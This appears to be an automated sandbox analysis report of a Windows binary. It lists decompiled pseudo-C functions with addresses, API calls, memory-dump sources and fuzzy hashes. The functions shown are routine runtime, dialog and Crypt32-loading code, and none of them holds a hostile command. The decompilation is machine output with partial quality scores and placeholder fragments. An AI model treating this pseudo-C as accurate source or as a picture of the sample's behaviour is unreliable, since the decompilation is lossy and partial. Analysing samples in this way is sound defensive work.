                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01238E25, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                    			E01238E25(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x124d6ac; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E01238429(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E0123A4F1(_t25, _t36, __eflags,  *0x124d6ac, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E01238C96(_t25, _t31, 0x1270288);
							E0123835E(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E0123835E();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E012383E6(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x124d6ac; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E01238429(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E0123A4F1(_t27, _t37, __eflags,  *0x124d6ac, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E01238C96(_t27, _t32, 0x1270288);
									E0123835E(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E0123835E();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E0123A49B(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E0123A49B(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                                                                                                                                    0x01238e25
                                                                                                                                                    0x01238e25
                                                                                                                                                    0x01238e25
                                                                                                                                                    0x01238e2f
                                                                                                                                                    0x01238e31
                                                                                                                                                    0x01238e36
                                                                                                                                                    0x01238e39
                                                                                                                                                    0x01238e47
                                                                                                                                                    0x01238e4e
                                                                                                                                                    0x01238e53
                                                                                                                                                    0x01238e56
                                                                                                                                                    0x01238e59
                                                                                                                                                    0x01238e6b
                                                                                                                                                    0x01238e70
                                                                                                                                                    0x01238e72
                                                                                                                                                    0x01238e7d
                                                                                                                                                    0x01238e84
                                                                                                                                                    0x01238e89
                                                                                                                                                    0x01238e8c
                                                                                                                                                    0x01238e8e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01238e74
                                                                                                                                                    0x01238e74
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01238e74
                                                                                                                                                    0x01238e5b
                                                                                                                                                    0x01238e5b
                                                                                                                                                    0x01238e5c
                                                                                                                                                    0x01238e5c
                                                                                                                                                    0x01238e61
                                                                                                                                                    0x01238e9c
                                                                                                                                                    0x01238e9d
                                                                                                                                                    0x01238ea3
                                                                                                                                                    0x01238ea8
                                                                                                                                                    0x01238eab
                                                                                                                                                    0x01238eac
                                                                                                                                                    0x01238ead
                                                                                                                                                    0x01238eb4
                                                                                                                                                    0x01238eb6
                                                                                                                                                    0x01238eb8
                                                                                                                                                    0x01238ebd
                                                                                                                                                    0x01238ec0
                                                                                                                                                    0x01238ece
                                                                                                                                                    0x01238eda
                                                                                                                                                    0x01238edd
                                                                                                                                                    0x01238ee0
                                                                                                                                                    0x01238ef2
                                                                                                                                                    0x01238ef7
                                                                                                                                                    0x01238ef9
                                                                                                                                                    0x01238f04
                                                                                                                                                    0x01238f0a
                                                                                                                                                    0x01238f12
                                                                                                                                                    0x01238f14
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01238efb
                                                                                                                                                    0x01238efb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01238efb
                                                                                                                                                    0x01238ee2
                                                                                                                                                    0x01238ee2
                                                                                                                                                    0x01238ee3
                                                                                                                                                    0x01238ee3
                                                                                                                                                    0x01238f16
                                                                                                                                                    0x01238f17
                                                                                                                                                    0x01238f17
                                                                                                                                                    0x01238ec2
                                                                                                                                                    0x01238ec8
                                                                                                                                                    0x01238ecc
                                                                                                                                                    0x01238f1f
                                                                                                                                                    0x01238f20
                                                                                                                                                    0x01238f26
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01238ecc
                                                                                                                                                    0x01238f2d
                                                                                                                                                    0x01238f2d
                                                                                                                                                    0x01238e3b
                                                                                                                                                    0x01238e41
                                                                                                                                                    0x01238e45
                                                                                                                                                    0x01238e90
                                                                                                                                                    0x01238e91
                                                                                                                                                    0x01238e9b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01238e45

                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,0124FF50,01233C54,0124FF50,?,?,012336CF,?,?,0124FF50), ref: 01238E29
                                                                                                                                                    • _free.LIBCMT ref: 01238E5C
                                                                                                                                                    • _free.LIBCMT ref: 01238E84
                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,0124FF50), ref: 01238E91
                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,0124FF50), ref: 01238E9D
                                                                                                                                                    • _abort.LIBCMT ref: 01238EA3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                    • Opcode ID: bebb59f4a6cc32a0d6df8a741b355a5bb981d3574c2da3c50d758081e6d09282
                                                                                                                                                    • Instruction ID: a64c2c664c6340713e167e0cd1bb4709b71536c077eb0c1f3dcba5a90921ef40
                                                                                                                                                    • Opcode Fuzzy Hash: bebb59f4a6cc32a0d6df8a741b355a5bb981d3574c2da3c50d758081e6d09282
                                                                                                                                                    • Instruction Fuzzy Hash: 45F02DFA5317026BD72333797C0DF3B15769BE1621B250714F719DB281EE6084018234
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122CB10, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                    			E0122CB10(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				intOrPtr _t18;
				void* _t19;
				struct HWND__* _t21;
				signed short _t22;

				_t16 = _a16;
				_t22 = _a12;
				_t21 = _a4;
				_t18 = _a8;
				if(E0121130B(_t17, _t21, _t18, _t22, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t19 = _t18 - 0x110;
				if(_t19 == 0) {
					 *0x126dca4 = _t16;
					SetDlgItemTextW(_t21, 0x66, _t16);
					SetDlgItemTextW(_t21, 0x68,  *0x126dca4);
					goto L10;
				}
				if(_t19 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t22 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t21, 0x68,  *0x126dca4, 0x800);
					_push(1);
					L7:
					EndDialog(_t21, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










                                                                                                                                                    0x0122cb11
                                                                                                                                                    0x0122cb16
                                                                                                                                                    0x0122cb1b
                                                                                                                                                    0x0122cb20
                                                                                                                                                    0x0122cb38
                                                                                                                                                    0x0122cb9a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122cb9c
                                                                                                                                                    0x0122cb3a
                                                                                                                                                    0x0122cb40
                                                                                                                                                    0x0122cb7f
                                                                                                                                                    0x0122cb85
                                                                                                                                                    0x0122cb94
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122cb94
                                                                                                                                                    0x0122cb45
                                                                                                                                                    0x0122cb54
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122cb54
                                                                                                                                                    0x0122cb4a
                                                                                                                                                    0x0122cb4d
                                                                                                                                                    0x0122cb71
                                                                                                                                                    0x0122cb77
                                                                                                                                                    0x0122cb5a
                                                                                                                                                    0x0122cb5b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122cb5b
                                                                                                                                                    0x0122cb52
                                                                                                                                                    0x0122cb58
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122cb58
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0121130B: GetDlgItem.USER32(00000000,00003021), ref: 0121134F
                                                                                                                                                      • Part of subcall function 0121130B: SetWindowTextW.USER32(00000000,012425B4), ref: 01211365
                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0122CB5B
                                                                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0122CB71
                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0122CB85
                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0122CB94
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                                                    • String ID: RENAMEDLG
                                                                                                                                                    • API String ID: 445417207-3299779563
                                                                                                                                                    • Opcode ID: 6a371be4cd5f957a81080f8d5a18fb431127c153dff356d6984b5620208e6165
                                                                                                                                                    • Instruction ID: 56c11e7ecee3ad6264f4e866555cebbacc54b76bb8fd2c51b977de7f1a4ba676
                                                                                                                                                    • Opcode Fuzzy Hash: 6a371be4cd5f957a81080f8d5a18fb431127c153dff356d6984b5620208e6165
                                                                                                                                                    • Instruction Fuzzy Hash: 4E0128323A43297BE6315A78BD0DF6F3B6CEF5AB42F004410F345A60C8D6A194249B75
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 012373E8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,01237399,?,?,01237339,?,0124AAB8,0000000C,01237490,?,00000002), ref: 01237408
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0123741B
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,01237399,?,?,01237339,?,0124AAB8,0000000C,01237490,?,00000002,00000000), ref: 0123743E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                    • Opcode ID: 3e7e25eccfcc37f7ce161c21b1adbdf5ca27d986f4050408bd3353ee2d96a7ce
                                                                                                                                                    • Instruction ID: 28470526c48a0251e6976878d24177ad68de063aa0c238b300033010ea4b9c4c
                                                                                                                                                    • Opcode Fuzzy Hash: 3e7e25eccfcc37f7ce161c21b1adbdf5ca27d986f4050408bd3353ee2d96a7ce
                                                                                                                                                    • Instruction Fuzzy Hash: 33F0A474610209FBDB259FA5F80DBAEBFB8EF44711F4140A8FA09A2140DB309940DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121EAB3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0121EAB3(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E0121FFE3(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}






                                                                                                                                                    0x0121eab4
                                                                                                                                                    0x0121eaba
                                                                                                                                                    0x0121eac1
                                                                                                                                                    0x0121eac6
                                                                                                                                                    0x0121eaca
                                                                                                                                                    0x0121eadf
                                                                                                                                                    0x0121eae2
                                                                                                                                                    0x0121eae8
                                                                                                                                                    0x0121eae8
                                                                                                                                                    0x0121eaeb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121eaeb
                                                                                                                                                    0x0121eaf0

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0121FFE3: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0121FFFE
                                                                                                                                                      • Part of subcall function 0121FFE3: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0121EAC6,Crypt32.dll,00000000,0121EB4A,?,?,0121EB2C,?,?,?), ref: 01220020
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0121EAD2
                                                                                                                                                    • GetProcAddress.KERNEL32(012571C0,CryptUnprotectMemory), ref: 0121EAE2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                                    • API String ID: 2141747552-1753850145
                                                                                                                                                    • Opcode ID: 1962c891373d4c94f5c32111b28a602b614b4d18c3426a282ef82a5e28a1725f
                                                                                                                                                    • Instruction ID: 3650aac5dfd20fdcea41dff14d64bee075b976eee113f2d83bfad0d57c9d0200
                                                                                                                                                    • Opcode Fuzzy Hash: 1962c891373d4c94f5c32111b28a602b614b4d18c3426a282ef82a5e28a1725f
                                                                                                                                                    • Instruction Fuzzy Hash: 37E01A79820742DBD7369B2AB808A067EE4AF24614B21981DB5D5D3244D6B490848B60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01237C09, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                    			E01237C09(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x124d668; // 0x6c4f95b1
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E01237F3C( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E01232F99(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E01232F99(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E01232F99(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E0123B593(_t56);
						_t40 = E0123835E(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E0123B593(_t56);
						E0123835E(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x124d668;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                                                                                                                                                    0x01237c09
                                                                                                                                                    0x01237c13
                                                                                                                                                    0x01237c17
                                                                                                                                                    0x01237c19
                                                                                                                                                    0x01237c1d
                                                                                                                                                    0x01237c27
                                                                                                                                                    0x01237c38
                                                                                                                                                    0x01237c3d
                                                                                                                                                    0x01237c3f
                                                                                                                                                    0x01237c41
                                                                                                                                                    0x01237c43
                                                                                                                                                    0x01237c45
                                                                                                                                                    0x01237c49
                                                                                                                                                    0x01237d03
                                                                                                                                                    0x01237d11
                                                                                                                                                    0x01237d13
                                                                                                                                                    0x01237d18
                                                                                                                                                    0x01237d1f
                                                                                                                                                    0x01237d21
                                                                                                                                                    0x01237d2f
                                                                                                                                                    0x01237d3e
                                                                                                                                                    0x01237d41
                                                                                                                                                    0x01237d43
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01237d44
                                                                                                                                                    0x01237c51
                                                                                                                                                    0x01237c56
                                                                                                                                                    0x01237c5b
                                                                                                                                                    0x01237c5d
                                                                                                                                                    0x01237c5d
                                                                                                                                                    0x01237c5f
                                                                                                                                                    0x01237c64
                                                                                                                                                    0x01237c68
                                                                                                                                                    0x01237c68
                                                                                                                                                    0x01237c6b
                                                                                                                                                    0x01237c8a
                                                                                                                                                    0x01237c8a
                                                                                                                                                    0x01237c8c
                                                                                                                                                    0x01237c8f
                                                                                                                                                    0x01237c98
                                                                                                                                                    0x01237c9b
                                                                                                                                                    0x01237ca0
                                                                                                                                                    0x01237ca3
                                                                                                                                                    0x01237ca8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01237caa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01237c6d
                                                                                                                                                    0x01237c6d
                                                                                                                                                    0x01237c6f
                                                                                                                                                    0x01237c78
                                                                                                                                                    0x01237c7b
                                                                                                                                                    0x01237c80
                                                                                                                                                    0x01237c83
                                                                                                                                                    0x01237c88
                                                                                                                                                    0x01237cb2
                                                                                                                                                    0x01237cb5
                                                                                                                                                    0x01237cb7
                                                                                                                                                    0x01237cba
                                                                                                                                                    0x01237cc2
                                                                                                                                                    0x01237cc8
                                                                                                                                                    0x01237ccf
                                                                                                                                                    0x01237cd1
                                                                                                                                                    0x01237cd9
                                                                                                                                                    0x01237ce8
                                                                                                                                                    0x01237cec
                                                                                                                                                    0x01237cee
                                                                                                                                                    0x01237cf1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01237cf3
                                                                                                                                                    0x01237cf6
                                                                                                                                                    0x01237cf8
                                                                                                                                                    0x01237cf8
                                                                                                                                                    0x01237cf9
                                                                                                                                                    0x01237cfb
                                                                                                                                                    0x01237cfe
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01237cf8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01237c88
                                                                                                                                                    0x01237c6b
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                    • Opcode ID: e7459652096ec0827452c8f8d87af8dc5d5ffdf3157dcdb10500c2b7ac196877
                                                                                                                                                    • Instruction ID: 3f8931d0b0705c2cc0dcc3f18d0abd1c47dfa1d0b4065d77ad6f136036172ce3
                                                                                                                                                    • Opcode Fuzzy Hash: e7459652096ec0827452c8f8d87af8dc5d5ffdf3157dcdb10500c2b7ac196877
                                                                                                                                                    • Instruction Fuzzy Hash: 2D41C1B6A103049FCF24DF78D884A6DB7F5EFC9710B154569E619EB381DB31AA01CB80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0123B510, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E0123B510() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E0123B4D9(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E01238398(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E0123835E(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                                                                                                                                                    0x0123b51f
                                                                                                                                                    0x0123b525
                                                                                                                                                    0x0123b57d
                                                                                                                                                    0x0123b57d
                                                                                                                                                    0x0123b527
                                                                                                                                                    0x0123b528
                                                                                                                                                    0x0123b52d
                                                                                                                                                    0x0123b536
                                                                                                                                                    0x0123b53c
                                                                                                                                                    0x0123b542
                                                                                                                                                    0x0123b547
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b549
                                                                                                                                                    0x0123b54f
                                                                                                                                                    0x0123b554
                                                                                                                                                    0x0123b572
                                                                                                                                                    0x0123b56c
                                                                                                                                                    0x0123b56c
                                                                                                                                                    0x0123b56e
                                                                                                                                                    0x0123b56e
                                                                                                                                                    0x0123b575
                                                                                                                                                    0x0123b57a
                                                                                                                                                    0x0123b547
                                                                                                                                                    0x0123b581
                                                                                                                                                    0x0123b584
                                                                                                                                                    0x0123b584
                                                                                                                                                    0x0123b592

                                                                                                                                                    APIs
                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0123B519
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0123B53C
                                                                                                                                                      • Part of subcall function 01238398: RtlAllocateHeap.NTDLL(00000000,?,?,?,01233866,?,0000015D,?,?,?,?,01234D42,000000FF,00000000,?,?), ref: 012383CA
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0123B562
                                                                                                                                                    • _free.LIBCMT ref: 0123B575
                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0123B584
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                    • Opcode ID: 0f79018d23db0a644434ebbd7a7fa0b2ddee8261aa03f3e2bec1ecab283f4ef4
                                                                                                                                                    • Instruction ID: 3ca0ee7bc68b306d4db2e13c89b5d377825ef34d627c3f802ffef866a3612708
                                                                                                                                                    • Opcode Fuzzy Hash: 0f79018d23db0a644434ebbd7a7fa0b2ddee8261aa03f3e2bec1ecab283f4ef4
